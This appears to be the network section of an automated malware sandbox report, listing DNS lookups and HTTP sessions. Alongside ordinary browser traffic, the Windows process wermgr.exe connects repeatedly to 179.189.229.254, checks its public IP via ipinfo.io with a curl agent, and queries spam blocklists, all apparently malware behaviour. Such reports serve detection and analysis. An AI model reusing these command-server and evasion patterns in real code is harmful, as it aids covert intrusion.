Oct 2, 2021 18:14:32.595319986 CEST	56432	53	192.168.2.5	8.8.8.8
Oct 2, 2021 18:14:32.608536005 CEST	53	56432	8.8.8.8	192.168.2.5
Oct 2, 2021 18:14:37.634280920 CEST	52929	53	192.168.2.5	8.8.8.8
Oct 2, 2021 18:14:37.647449970 CEST	53	52929	8.8.8.8	192.168.2.5
Oct 2, 2021 18:14:47.287564993 CEST	64317	53	192.168.2.5	8.8.8.8
Oct 2, 2021 18:14:47.300116062 CEST	53	64317	8.8.8.8	192.168.2.5
Oct 2, 2021 18:14:48.017380953 CEST	61004	53	192.168.2.5	8.8.8.8
Oct 2, 2021 18:14:48.043730021 CEST	53	61004	8.8.8.8	192.168.2.5
Oct 2, 2021 18:15:03.729909897 CEST	56895	53	192.168.2.5	8.8.8.8
Oct 2, 2021 18:15:03.743542910 CEST	53	56895	8.8.8.8	192.168.2.5
Oct 2, 2021 18:15:06.215245008 CEST	62372	53	192.168.2.5	8.8.8.8
Oct 2, 2021 18:15:06.229805946 CEST	53	62372	8.8.8.8	192.168.2.5
Oct 2, 2021 18:15:33.184767008 CEST	61515	53	192.168.2.5	8.8.8.8
Oct 2, 2021 18:15:33.199387074 CEST	53	61515	8.8.8.8	192.168.2.5
Oct 2, 2021 18:15:40.457926989 CEST	56675	53	192.168.2.5	8.8.8.8
Oct 2, 2021 18:15:40.472158909 CEST	53	56675	8.8.8.8	192.168.2.5
Oct 2, 2021 18:15:41.213460922 CEST	57172	53	192.168.2.5	8.8.8.8
Oct 2, 2021 18:15:41.227222919 CEST	53	57172	8.8.8.8	192.168.2.5
Oct 2, 2021 18:15:41.876480103 CEST	55267	53	192.168.2.5	8.8.8.8
Oct 2, 2021 18:15:41.889882088 CEST	53	55267	8.8.8.8	192.168.2.5
Oct 2, 2021 18:15:42.317466021 CEST	50969	53	192.168.2.5	8.8.8.8
Oct 2, 2021 18:15:42.330576897 CEST	53	50969	8.8.8.8	192.168.2.5
Oct 2, 2021 18:15:42.829430103 CEST	64362	53	192.168.2.5	8.8.8.8
Oct 2, 2021 18:15:42.843739033 CEST	53	64362	8.8.8.8	192.168.2.5
Oct 2, 2021 18:15:43.402146101 CEST	54766	53	192.168.2.5	8.8.8.8
Oct 2, 2021 18:15:43.416356087 CEST	53	54766	8.8.8.8	192.168.2.5
Oct 2, 2021 18:15:44.029211998 CEST	61446	53	192.168.2.5	8.8.8.8
Oct 2, 2021 18:15:44.042747021 CEST	53	61446	8.8.8.8	192.168.2.5
Oct 2, 2021 18:15:45.487946987 CEST	57515	53	192.168.2.5	8.8.8.8
Oct 2, 2021 18:15:45.501251936 CEST	53	57515	8.8.8.8	192.168.2.5
Oct 2, 2021 18:15:46.541853905 CEST	58199	53	192.168.2.5	8.8.8.8
Oct 2, 2021 18:15:46.555165052 CEST	53	58199	8.8.8.8	192.168.2.5
Oct 2, 2021 18:15:47.050017118 CEST	65221	53	192.168.2.5	8.8.8.8
Oct 2, 2021 18:15:47.063642979 CEST	53	65221	8.8.8.8	192.168.2.5
Oct 2, 2021 18:16:05.230196953 CEST	61573	53	192.168.2.5	8.8.8.8
Oct 2, 2021 18:16:05.257354021 CEST	53	61573	8.8.8.8	192.168.2.5
Oct 2, 2021 18:16:20.575963020 CEST	56562	53	192.168.2.5	8.8.8.8
Oct 2, 2021 18:16:20.589771986 CEST	53	56562	8.8.8.8	192.168.2.5
Oct 2, 2021 18:17:24.543479919 CEST	53591	53	192.168.2.5	8.8.8.8
Oct 2, 2021 18:17:24.556716919 CEST	53	53591	8.8.8.8	192.168.2.5
Oct 2, 2021 18:17:40.331681967 CEST	59688	53	192.168.2.5	8.8.8.8
Oct 2, 2021 18:17:40.345036983 CEST	53	59688	8.8.8.8	192.168.2.5

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class
Oct 2, 2021 18:13:13.783262014 CEST	192.168.2.5	8.8.8.8	0x548e	Standard query (0)	www.msn.com	A (IP address)	IN (0x0001)
Oct 2, 2021 18:13:17.016222000 CEST	192.168.2.5	8.8.8.8	0x1ee7	Standard query (0)	web.vortex.data.msn.com	A (IP address)	IN (0x0001)
Oct 2, 2021 18:13:17.621824980 CEST	192.168.2.5	8.8.8.8	0xa2a0	Standard query (0)	contextual.media.net	A (IP address)	IN (0x0001)
Oct 2, 2021 18:13:17.691049099 CEST	192.168.2.5	8.8.8.8	0xd981	Standard query (0)	geolocation.onetrust.com	A (IP address)	IN (0x0001)
Oct 2, 2021 18:13:17.911060095 CEST	192.168.2.5	8.8.8.8	0x8cf	Standard query (0)	btloader.com	A (IP address)	IN (0x0001)
Oct 2, 2021 18:13:18.537146091 CEST	192.168.2.5	8.8.8.8	0x535c	Standard query (0)	lg3.media.net	A (IP address)	IN (0x0001)
Oct 2, 2021 18:13:19.687381029 CEST	192.168.2.5	8.8.8.8	0x9882	Standard query (0)	hblg.media.net	A (IP address)	IN (0x0001)
Oct 2, 2021 18:13:21.779231071 CEST	192.168.2.5	8.8.8.8	0x8c1b	Standard query (0)	cvision.media.net	A (IP address)	IN (0x0001)
Oct 2, 2021 18:13:22.686038971 CEST	192.168.2.5	8.8.8.8	0x5071	Standard query (0)	srtb.msn.com	A (IP address)	IN (0x0001)
Oct 2, 2021 18:13:23.678705931 CEST	192.168.2.5	8.8.8.8	0x4b43	Standard query (0)	s.yimg.com	A (IP address)	IN (0x0001)
Oct 2, 2021 18:13:23.721168041 CEST	192.168.2.5	8.8.8.8	0xe433	Standard query (0)	dcdn.adnxs.com	A (IP address)	IN (0x0001)
Oct 2, 2021 18:13:23.727344036 CEST	192.168.2.5	8.8.8.8	0xa77c	Standard query (0)	img.img-taboola.com	A (IP address)	IN (0x0001)
Oct 2, 2021 18:14:05.076311111 CEST	192.168.2.5	8.8.8.8	0xbcb8	Standard query (0)	ipinfo.io	A (IP address)	IN (0x0001)
Oct 2, 2021 18:14:13.706814051 CEST	192.168.2.5	8.8.8.8	0xe8c9	Standard query (0)	18.222.32.185.zen.spamhaus.org	A (IP address)	IN (0x0001)
Oct 2, 2021 18:14:13.730823040 CEST	192.168.2.5	8.8.8.8	0xd58b	Standard query (0)	18.222.32.185.cbl.abuseat.org	A (IP address)	IN (0x0001)
Oct 2, 2021 18:14:13.779966116 CEST	192.168.2.5	8.8.8.8	0x4158	Standard query (0)	18.222.32.185.b.barracudacentral.org	A (IP address)	IN (0x0001)
Oct 2, 2021 18:14:13.902286053 CEST	192.168.2.5	8.8.8.8	0xe0c	Standard query (0)	18.222.32.185.dnsbl-1.uceprotect.net	A (IP address)	IN (0x0001)
Oct 2, 2021 18:14:13.932503939 CEST	192.168.2.5	8.8.8.8	0x7188	Standard query (0)	18.222.32.185.spam.dnsbl.sorbs.net	A (IP address)	IN (0x0001)

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class
Oct 2, 2021 18:13:13.797555923 CEST	8.8.8.8	192.168.2.5	0x548e	No error (0)	www.msn.com	www-msn-com.a-0003.a-msedge.net		CNAME (Canonical name)	IN (0x0001)
Oct 2, 2021 18:13:17.050605059 CEST	8.8.8.8	192.168.2.5	0x1ee7	No error (0)	web.vortex.data.msn.com	web.vortex.data.microsoft.com		CNAME (Canonical name)	IN (0x0001)
Oct 2, 2021 18:13:17.636615992 CEST	8.8.8.8	192.168.2.5	0xa2a0	No error (0)	contextual.media.net		2.22.155.145	A (IP address)	IN (0x0001)
Oct 2, 2021 18:13:17.712910891 CEST	8.8.8.8	192.168.2.5	0xd981	No error (0)	geolocation.onetrust.com		104.20.184.68	A (IP address)	IN (0x0001)
Oct 2, 2021 18:13:17.712910891 CEST	8.8.8.8	192.168.2.5	0xd981	No error (0)	geolocation.onetrust.com		104.20.185.68	A (IP address)	IN (0x0001)
Oct 2, 2021 18:13:17.950910091 CEST	8.8.8.8	192.168.2.5	0x8cf	No error (0)	btloader.com		104.26.6.139	A (IP address)	IN (0x0001)
Oct 2, 2021 18:13:17.950910091 CEST	8.8.8.8	192.168.2.5	0x8cf	No error (0)	btloader.com		172.67.70.134	A (IP address)	IN (0x0001)
Oct 2, 2021 18:13:17.950910091 CEST	8.8.8.8	192.168.2.5	0x8cf	No error (0)	btloader.com		104.26.7.139	A (IP address)	IN (0x0001)
Oct 2, 2021 18:13:18.552196980 CEST	8.8.8.8	192.168.2.5	0x535c	No error (0)	lg3.media.net		2.22.155.145	A (IP address)	IN (0x0001)
Oct 2, 2021 18:13:19.702475071 CEST	8.8.8.8	192.168.2.5	0x9882	No error (0)	hblg.media.net		2.22.155.145	A (IP address)	IN (0x0001)
Oct 2, 2021 18:13:21.800718069 CEST	8.8.8.8	192.168.2.5	0x8c1b	No error (0)	cvision.media.net	cvision.media.net.edgekey.net		CNAME (Canonical name)	IN (0x0001)
Oct 2, 2021 18:13:22.699258089 CEST	8.8.8.8	192.168.2.5	0x5071	No error (0)	srtb.msn.com	www.msn.com		CNAME (Canonical name)	IN (0x0001)
Oct 2, 2021 18:13:22.699258089 CEST	8.8.8.8	192.168.2.5	0x5071	No error (0)	www.msn.com	www-msn-com.a-0003.a-msedge.net		CNAME (Canonical name)	IN (0x0001)
Oct 2, 2021 18:13:23.691838026 CEST	8.8.8.8	192.168.2.5	0x4b43	No error (0)	s.yimg.com	edge.gycpi.b.yahoodns.net		CNAME (Canonical name)	IN (0x0001)
Oct 2, 2021 18:13:23.691838026 CEST	8.8.8.8	192.168.2.5	0x4b43	No error (0)	edge.gycpi.b.yahoodns.net		87.248.118.23	A (IP address)	IN (0x0001)
Oct 2, 2021 18:13:23.691838026 CEST	8.8.8.8	192.168.2.5	0x4b43	No error (0)	edge.gycpi.b.yahoodns.net		87.248.118.22	A (IP address)	IN (0x0001)
Oct 2, 2021 18:13:23.740578890 CEST	8.8.8.8	192.168.2.5	0xe433	No error (0)	dcdn.adnxs.com	secure-adnxs.edgekey.net		CNAME (Canonical name)	IN (0x0001)
Oct 2, 2021 18:13:23.740819931 CEST	8.8.8.8	192.168.2.5	0xa77c	No error (0)	img.img-taboola.com	tls13.taboola.map.fastly.net		CNAME (Canonical name)	IN (0x0001)
Oct 2, 2021 18:13:23.740819931 CEST	8.8.8.8	192.168.2.5	0xa77c	No error (0)	tls13.taboola.map.fastly.net		151.101.1.44	A (IP address)	IN (0x0001)
Oct 2, 2021 18:13:23.740819931 CEST	8.8.8.8	192.168.2.5	0xa77c	No error (0)	tls13.taboola.map.fastly.net		151.101.65.44	A (IP address)	IN (0x0001)
Oct 2, 2021 18:13:23.740819931 CEST	8.8.8.8	192.168.2.5	0xa77c	No error (0)	tls13.taboola.map.fastly.net		151.101.129.44	A (IP address)	IN (0x0001)
Oct 2, 2021 18:13:23.740819931 CEST	8.8.8.8	192.168.2.5	0xa77c	No error (0)	tls13.taboola.map.fastly.net		151.101.193.44	A (IP address)	IN (0x0001)
Oct 2, 2021 18:14:05.089587927 CEST	8.8.8.8	192.168.2.5	0xbcb8	No error (0)	ipinfo.io		34.117.59.81	A (IP address)	IN (0x0001)
Oct 2, 2021 18:14:13.727319002 CEST	8.8.8.8	192.168.2.5	0xe8c9	Name error (3)	18.222.32.185.zen.spamhaus.org	none	none	A (IP address)	IN (0x0001)
Oct 2, 2021 18:14:13.777357101 CEST	8.8.8.8	192.168.2.5	0xd58b	Name error (3)	18.222.32.185.cbl.abuseat.org	none	none	A (IP address)	IN (0x0001)
Oct 2, 2021 18:14:13.899030924 CEST	8.8.8.8	192.168.2.5	0x4158	Name error (3)	18.222.32.185.b.barracudacentral.org	none	none	A (IP address)	IN (0x0001)
Oct 2, 2021 18:14:13.928888083 CEST	8.8.8.8	192.168.2.5	0xe0c	Name error (3)	18.222.32.185.dnsbl-1.uceprotect.net	none	none	A (IP address)	IN (0x0001)
Oct 2, 2021 18:14:13.960172892 CEST	8.8.8.8	192.168.2.5	0x7188	Name error (3)	18.222.32.185.spam.dnsbl.sorbs.net	none	none	A (IP address)	IN (0x0001)

HTTP Request Dependency Graph

https:

geolocation.onetrust.com

btloader.com

s.yimg.com

img.img-taboola.com

179.189.229.254

ipinfo.io

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
0	192.168.2.5	49775	104.20.184.68	443	C:\Program Files (x86)\Internet Explorer\iexplore.exe

Timestamp	kBytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
1	192.168.2.5	49788	104.26.6.139	443	C:\Program Files (x86)\Internet Explorer\iexplore.exe

Timestamp	kBytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
10	192.168.2.5	49878	179.189.229.254	443	C:\Windows\System32\wermgr.exe

Timestamp	kBytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
11	192.168.2.5	49879	179.189.229.254	443	C:\Windows\System32\wermgr.exe

Timestamp	kBytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
12	192.168.2.5	49884	179.189.229.254	443	C:\Windows\System32\wermgr.exe

Timestamp	kBytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
13	192.168.2.5	49866	34.117.59.81	80	C:\Windows\System32\wermgr.exe

Timestamp	kBytes transferred	Direction	Data
Oct 2, 2021 18:14:05.108855963 CEST	5841	OUT	GET /ip HTTP/1.1 Connection: Keep-Alive User-Agent: curl/7.78.0 Host: ipinfo.io
Oct 2, 2021 18:14:05.235084057 CEST	5842	IN	HTTP/1.1 200 OK access-control-allow-origin: * content-type: text/html; charset=utf-8 content-length: 13 date: Sat, 02 Oct 2021 16:14:05 GMT x-envoy-upstream-service-time: 1 Via: 1.1 google Data Raw: 31 38 35 2e 33 32 2e 32 32 32 2e 31 38 Data Ascii: 185.32.222.18

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
2	192.168.2.5	49821	87.248.118.23	443	C:\Program Files (x86)\Internet Explorer\iexplore.exe

Timestamp	kBytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
3	192.168.2.5	49826	151.101.1.44	443	C:\Program Files (x86)\Internet Explorer\iexplore.exe

Timestamp	kBytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
4	192.168.2.5	49825	151.101.1.44	443	C:\Program Files (x86)\Internet Explorer\iexplore.exe

Timestamp	kBytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
5	192.168.2.5	49827	151.101.1.44	443	C:\Program Files (x86)\Internet Explorer\iexplore.exe

Timestamp	kBytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
6	192.168.2.5	49861	179.189.229.254	443	C:\Windows\System32\wermgr.exe

Timestamp	kBytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
7	192.168.2.5	49868	179.189.229.254	443	C:\Windows\System32\wermgr.exe

Timestamp	kBytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
8	192.168.2.5	49871	179.189.229.254	443	C:\Windows\System32\wermgr.exe

Timestamp	kBytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
9	192.168.2.5	49873	179.189.229.254	443	C:\Windows\System32\wermgr.exe

Timestamp	kBytes transferred	Direction	Data

HTTPS Proxied Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
0	192.168.2.5	49775	104.20.184.68	443	C:\Program Files (x86)\Internet Explorer\iexplore.exe

Timestamp	Direction	Data
2021-10-02 16:13:17 UTC	OUT	GET /cookieconsentpub/v1/geo/location HTTP/1.1 Accept: application/javascript, /;q=0.8 Referer: https://www.msn.com/de-ch/?ocid=iehp Accept-Language: en-US User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko Accept-Encoding: gzip, deflate Host: geolocation.onetrust.com Connection: Keep-Alive
2021-10-02 16:13:17 UTC	IN	HTTP/1.1 200 OK Date: Sat, 02 Oct 2021 16:13:17 GMT Content-Type: text/javascript Content-Length: 164 Connection: close Expect-CT: max-age=604800, report-uri="https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct" Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Server: cloudflare CF-RAY: 697f379a58030229-ZRH
2021-10-02 16:13:17 UTC	IN	Data Raw: 6a 73 6f 6e 46 65 65 64 28 7b 22 63 6f 75 6e 74 72 79 22 3a 22 43 48 22 2c 22 73 74 61 74 65 22 3a 22 22 2c 22 73 74 61 74 65 4e 61 6d 65 22 3a 22 22 2c 22 7a 69 70 63 6f 64 65 22 3a 22 22 2c 22 74 69 6d 65 7a 6f 6e 65 22 3a 22 45 75 72 6f 70 65 2f 5a 75 72 69 63 68 22 2c 22 6c 61 74 69 74 75 64 65 22 3a 22 34 37 2e 31 34 34 39 30 22 2c 22 6c 6f 6e 67 69 74 75 64 65 22 3a 22 38 2e 31 35 35 31 30 22 2c 22 63 69 74 79 22 3a 22 22 2c 22 63 6f 6e 74 69 6e 65 6e 74 22 3a 22 45 55 22 7d 29 3b Data Ascii: jsonFeed({"country":"CH","state":"","stateName":"","zipcode":"","timezone":"Europe/Zurich","latitude":"47.14490","longitude":"8.15510","city":"","continent":"EU"});

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
1	192.168.2.5	49788	104.26.6.139	443	C:\Program Files (x86)\Internet Explorer\iexplore.exe

Timestamp	kBytes transferred	Direction	Data
2021-10-02 16:13:18 UTC	0	OUT	GET /tag?o=6208086025961472&upapi=true HTTP/1.1 Accept: application/javascript, /;q=0.8 Referer: https://www.msn.com/de-ch/?ocid=iehp Accept-Language: en-US User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko Accept-Encoding: gzip, deflate Host: btloader.com Connection: Keep-Alive
2021-10-02 16:13:18 UTC	1	IN	HTTP/1.1 200 OK Date: Sat, 02 Oct 2021 16:13:18 GMT Content-Type: application/javascript Content-Length: 10157 Connection: close Access-Control-Allow-Origin: * Cache-Control: public, max-age=1800, must-revalidate Etag: "643eb1aad6ba3932ca744b96ffc00048" Vary: Origin Via: 1.1 google CF-Cache-Status: HIT Age: 2271 Accept-Ranges: bytes Expect-CT: max-age=604800, report-uri="https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct" Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=Df3HhebQSaK2U2EsfmFMUEWvswcsayQGn%2BTM0LTHBJUIHca%2F4HuwNtl3Ma6o9ppQZlba0U6EE%2BZWtCuCjh%2FOjTcDj04D7QORSgLaLNhIPsXn%2FM3rGbC7Z2bVkD2evQ%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 697f379bbb3d59c5-MXP
2021-10-02 16:13:18 UTC	1	IN	Data Raw: 21 66 75 6e 63 74 69 6f 6e 28 29 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 66 75 6e 63 74 69 6f 6e 20 72 28 65 2c 69 2c 63 2c 6c 29 7b 72 65 74 75 72 6e 20 6e 65 77 28 63 3d 63 7c 7c 50 72 6f 6d 69 73 65 29 28 66 75 6e 63 74 69 6f 6e 28 6e 2c 74 29 7b 66 75 6e 63 74 69 6f 6e 20 6f 28 65 29 7b 74 72 79 7b 72 28 6c 2e 6e 65 78 74 28 65 29 29 7d 63 61 74 63 68 28 65 29 7b 74 28 65 29 7d 7d 66 75 6e 63 74 69 6f 6e 20 61 28 65 29 7b 74 72 79 7b 72 28 6c 2e 74 68 72 6f 77 28 65 29 29 7d 63 61 74 63 68 28 65 29 7b 74 28 65 29 7d 7d 66 75 6e 63 74 69 6f 6e 20 72 28 65 29 7b 76 61 72 20 74 3b 65 2e 64 6f 6e 65 3f 6e 28 65 2e 76 61 6c 75 65 29 3a 28 28 74 3d 65 2e 76 61 6c 75 65 29 69 6e 73 74 61 6e 63 65 6f 66 20 63 3f 74 3a 6e 65 77 20 63 28 66 75 6e 63 74 69 6f Data Ascii: !function(){"use strict";function r(e,i,c,l){return new(c=c\|\|Promise)(function(n,t){function o(e){try{r(l.next(e))}catch(e){t(e)}}function a(e){try{r(l.throw(e))}catch(e){t(e)}}function r(e){var t;e.done?n(e.value):((t=e.value)instanceof c?t:new c(functio
2021-10-02 16:13:18 UTC	2	IN	Data Raw: 20 74 28 74 29 7b 72 65 74 75 72 6e 20 66 75 6e 63 74 69 6f 6e 28 65 29 7b 72 65 74 75 72 6e 20 66 75 6e 63 74 69 6f 6e 28 74 29 7b 69 66 28 61 29 74 68 72 6f 77 20 6e 65 77 20 54 79 70 65 45 72 72 6f 72 28 22 47 65 6e 65 72 61 74 6f 72 20 69 73 20 61 6c 72 65 61 64 79 20 65 78 65 63 75 74 69 6e 67 2e 22 29 3b 66 6f 72 28 3b 63 3b 29 74 72 79 7b 69 66 28 61 3d 31 2c 72 26 26 28 69 3d 32 26 74 5b 30 5d 3f 72 2e 72 65 74 75 72 6e 3a 74 5b 30 5d 3f 72 2e 74 68 72 6f 77 7c 7c 28 28 69 3d 72 2e 72 65 74 75 72 6e 29 26 26 69 2e 63 61 6c 6c 28 72 29 2c 30 29 3a 72 2e 6e 65 78 74 29 26 26 21 28 69 3d 69 2e 63 61 6c 6c 28 72 2c 74 5b 31 5d 29 29 2e 64 6f 6e 65 29 72 65 74 75 72 6e 20 69 3b 73 77 69 74 63 68 28 72 3d 30 2c 69 26 26 28 74 3d 5b 32 26 74 5b 30 5d 2c Data Ascii: t(t){return function(e){return function(t){if(a)throw new TypeError("Generator is already executing.");for(;c;)try{if(a=1,r&&(i=2&t[0]?r.return:t[0]?r.throw\|\|((i=r.return)&&i.call(r),0):r.next)&&!(i=i.call(r,t[1])).done)return i;switch(r=0,i&&(t=[2&t[0],
2021-10-02 16:13:18 UTC	3	IN	Data Raw: 6f 64 79 7c 7c 77 69 6e 64 6f 77 2e 64 6f 63 75 6d 65 6e 74 2e 64 6f 63 75 6d 65 6e 74 45 6c 65 6d 65 6e 74 29 2e 61 70 70 65 6e 64 43 68 69 6c 64 28 65 29 7d 29 7d 76 61 72 20 75 2c 61 2c 64 2c 62 2c 6d 3b 75 3d 22 36 32 30 38 30 38 36 30 32 35 39 36 31 34 37 32 22 2c 61 3d 22 62 74 6c 6f 61 64 65 72 2e 63 6f 6d 22 2c 64 3d 22 61 70 69 2e 62 74 6c 6f 61 64 65 72 2e 63 6f 6d 22 2c 62 3d 22 32 2e 30 2e 32 2d 32 2d 67 66 64 63 39 30 35 34 22 2c 6d 3d 22 22 3b 76 61 72 20 6f 3d 7b 22 6d 73 6e 2e 63 6f 6d 22 3a 7b 22 63 6f 6e 74 65 6e 74 5f 65 6e 61 62 6c 65 64 22 3a 74 72 75 65 2c 22 6d 6f 62 69 6c 65 5f 63 6f 6e 74 65 6e 74 5f 65 6e 61 62 6c 65 64 22 3a 66 61 6c 73 65 2c 22 77 65 62 73 69 74 65 5f 69 64 22 3a 22 35 36 37 31 37 33 37 33 38 38 36 39 35 35 35 Data Ascii: ody\|\|window.document.documentElement).appendChild(e)})}var u,a,d,b,m;u="6208086025961472",a="btloader.com",d="api.btloader.com",b="2.0.2-2-gfdc9054",m="";var o={"msn.com":{"content_enabled":true,"mobile_content_enabled":false,"website_id":"567173738869555
2021-10-02 16:13:18 UTC	5	IN	Data Raw: 2e 69 6e 64 65 78 4f 66 28 6e 2e 74 6f 4c 6f 77 65 72 43 61 73 65 28 29 29 29 26 26 28 74 3d 21 30 2c 70 2e 77 65 62 73 69 74 65 49 44 3d 6f 5b 6e 5d 2e 77 65 62 73 69 74 65 5f 69 64 2c 70 2e 63 6f 6e 74 65 6e 74 45 6e 61 62 6c 65 64 3d 6f 5b 6e 5d 2e 63 6f 6e 74 65 6e 74 5f 65 6e 61 62 6c 65 64 2c 70 2e 6d 6f 62 69 6c 65 43 6f 6e 74 65 6e 74 45 6e 61 62 6c 65 64 3d 6f 5b 6e 5d 2e 6d 6f 62 69 6c 65 5f 63 6f 6e 74 65 6e 74 5f 65 6e 61 62 6c 65 64 29 3b 74 7c 7c 28 28 6e 65 77 20 49 6d 61 67 65 29 2e 73 72 63 3d 22 2f 2f 22 2b 64 2b 22 2f 6c 3f 65 76 65 6e 74 3d 75 6e 6b 6e 6f 77 6e 44 6f 6d 61 69 6e 26 6f 72 67 3d 22 2b 75 2b 22 26 64 6f 6d 61 69 6e 3d 22 2b 65 29 7d 28 29 2c 77 69 6e 64 6f 77 2e 5f 5f 62 74 5f 74 61 67 5f 64 3d 7b 6f 72 67 49 44 3a 75 2c Data Ascii: .indexOf(n.toLowerCase()))&&(t=!0,p.websiteID=o[n].website_id,p.contentEnabled=o[n].content_enabled,p.mobileContentEnabled=o[n].mobile_content_enabled);t\|\|((new Image).src="//"+d+"/l?event=unknownDomain&org="+u+"&domain="+e)}(),window.__bt_tag_d={orgID:u,
2021-10-02 16:13:18 UTC	6	IN	Data Raw: 74 69 6f 6e 28 65 29 7b 76 61 72 20 74 3d 63 2e 62 75 6e 64 6c 65 73 5b 65 5d 3b 69 5b 65 5d 3d 7b 6d 69 6e 3a 4d 61 74 68 2e 74 72 75 6e 63 28 31 30 30 2a 28 2b 6f 2b 30 29 29 2c 6d 61 78 3a 4d 61 74 68 2e 74 72 75 6e 63 28 31 30 30 2a 28 2b 6f 2b 30 2b 74 29 29 7d 2c 6f 2b 3d 74 7d 29 7d 76 61 72 20 6c 3d 74 5b 30 5d 3b 69 66 28 6e 75 6c 6c 21 3d 6c 26 26 6c 2e 62 75 6e 64 6c 65 73 29 7b 76 61 72 20 73 3d 6f 2c 75 3d 31 2d 6f 3b 4f 62 6a 65 63 74 2e 6b 65 79 73 28 6c 2e 62 75 6e 64 6c 65 73 29 2e 73 6f 72 74 28 29 2e 66 6f 72 45 61 63 68 28 66 75 6e 63 74 69 6f 6e 28 65 29 7b 76 61 72 20 74 3d 6c 2e 62 75 6e 64 6c 65 73 5b 65 5d 3b 69 5b 65 5d 3d 7b 6d 69 6e 3a 4d 61 74 68 2e 74 72 75 6e 63 28 31 30 30 2a 28 73 2b 75 2a 61 29 29 2c 6d 61 78 3a 4d 61 74 Data Ascii: tion(e){var t=c.bundles[e];i[e]={min:Math.trunc(100(+o+0)),max:Math.trunc(100(+o+0+t))},o+=t})}var l=t[0];if(null!=l&&l.bundles){var s=o,u=1-o;Object.keys(l.bundles).sort().forEach(function(e){var t=l.bundles[e];i[e]={min:Math.trunc(100(s+ua)),max:Mat
2021-10-02 16:13:18 UTC	7	IN	Data Raw: 20 77 69 6e 64 6f 77 2e 64 69 73 70 61 74 63 68 45 76 65 6e 74 28 6f 29 7d 63 61 74 63 68 28 65 29 7b 7d 76 61 72 20 61 3d 64 6f 63 75 6d 65 6e 74 2e 63 72 65 61 74 65 45 76 65 6e 74 28 22 43 75 73 74 6f 6d 45 76 65 6e 74 22 29 3b 61 2e 69 6e 69 74 43 75 73 74 6f 6d 45 76 65 6e 74 28 74 2c 6e 2e 62 75 62 62 6c 65 73 2c 6e 2e 63 61 6e 63 65 6c 61 62 6c 65 2c 6e 2e 64 65 74 61 69 6c 29 2c 77 69 6e 64 6f 77 2e 64 69 73 70 61 74 63 68 45 76 65 6e 74 28 61 29 7d 66 3d 7b 7d 2c 77 69 6e 64 6f 77 2e 5f 5f 62 74 5f 69 6e 74 72 6e 6c 3d 7b 74 72 61 63 65 49 44 3a 77 2e 74 72 61 63 65 49 44 7d 3b 74 72 79 7b 21 66 75 6e 63 74 69 6f 6e 28 29 7b 72 28 74 68 69 73 2c 76 6f 69 64 20 30 2c 76 6f 69 64 20 30 2c 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 74 2c 6e 2c 6f Data Ascii: window.dispatchEvent(o)}catch(e){}var a=document.createEvent("CustomEvent");a.initCustomEvent(t,n.bubbles,n.cancelable,n.detail),window.dispatchEvent(a)}f={},window.__bt_intrnl={traceID:w.traceID};try{!function(){r(this,void 0,void 0,function(){var t,n,o
2021-10-02 16:13:18 UTC	9	IN	Data Raw: 63 65 43 6f 6e 74 65 6e 74 22 29 7c 7c 70 2e 63 6f 6e 74 65 6e 74 45 6e 61 62 6c 65 64 2c 70 2e 6d 6f 62 69 6c 65 43 6f 6e 74 65 6e 74 45 6e 61 62 6c 65 64 3d 22 74 72 75 65 22 3d 3d 6c 6f 63 61 6c 53 74 6f 72 61 67 65 2e 67 65 74 49 74 65 6d 28 22 66 6f 72 63 65 4d 6f 62 69 6c 65 43 6f 6e 74 65 6e 74 22 29 7c 7c 70 2e 6d 6f 62 69 6c 65 43 6f 6e 74 65 6e 74 45 6e 61 62 6c 65 64 29 2c 70 2e 77 65 62 73 69 74 65 49 44 26 26 70 2e 63 6f 6e 74 65 6e 74 45 6e 61 62 6c 65 64 26 26 28 21 28 6e 3d 2f 28 61 6e 64 72 6f 69 64 7c 62 62 5c 64 2b 7c 6d 65 65 67 6f 29 2e 2b 6d 6f 62 69 6c 65 7c 61 76 61 6e 74 67 6f 7c 62 61 64 61 5c 2f 7c 62 6c 61 63 6b 62 65 72 72 79 7c 62 6c 61 7a 65 72 7c 63 6f 6d 70 61 6c 7c 65 6c 61 69 6e 65 7c 66 65 6e 6e 65 63 7c 68 69 70 74 6f Data Ascii: ceContent")\|\|p.contentEnabled,p.mobileContentEnabled="true"==localStorage.getItem("forceMobileContent")\|\|p.mobileContentEnabled),p.websiteID&&p.contentEnabled&&(!(n=/(android\|bb\d+\|meego).+mobile\|avantgo\|bada\/\|blackberry\|blazer\|compal\|elaine\|fennec\|hipto
